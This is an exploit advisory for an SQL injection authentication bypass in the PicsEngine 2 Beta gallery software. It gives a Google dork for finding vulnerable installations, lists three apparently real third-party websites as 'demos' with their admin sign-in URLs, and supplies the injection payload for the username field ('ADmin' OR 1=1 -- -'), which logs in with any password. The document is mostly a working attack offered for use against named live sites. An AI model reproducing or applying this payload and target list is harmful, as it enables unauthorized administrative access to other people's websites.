################################################ # Exploit Title: PicsEngine 2 Beta - SQL Injection Authentication Bypass Vulnerability # Google Dork: intitle:"Powered By PicsEngine 2 Beta" # Date: 28-1-2016 # Twitter :D : https://twitter.com/Blast3r_ma # Exploit Author: Blast3r_ma # Software Link: http://www.commentcamarche.net/download/telecharger-34086165-picsengine # Software Link: http://telecharger.logiciel.net/picsengine/ # Tested on: Windows , Linux # Version: 2 Beta ################################################ =========Demos:================= http://www.ethnomusika.org/public/gallery/admin/signin.php?ref=/public/gallery/admin/ http://www.sylval.com/galerie/admin/signin.php?ref=/galerie/admin/ http://chomette-architectes.com/galerie/admin/signin.php?ref=/galerie/admin/ ....... ==================================== Path: ================== http://<target>/gallery/admin or http://<target>/admin ============== POC-Exploit: ============ *Username: ADmin' OR 1=1 -- - *Password: lksjfksjflsdkfj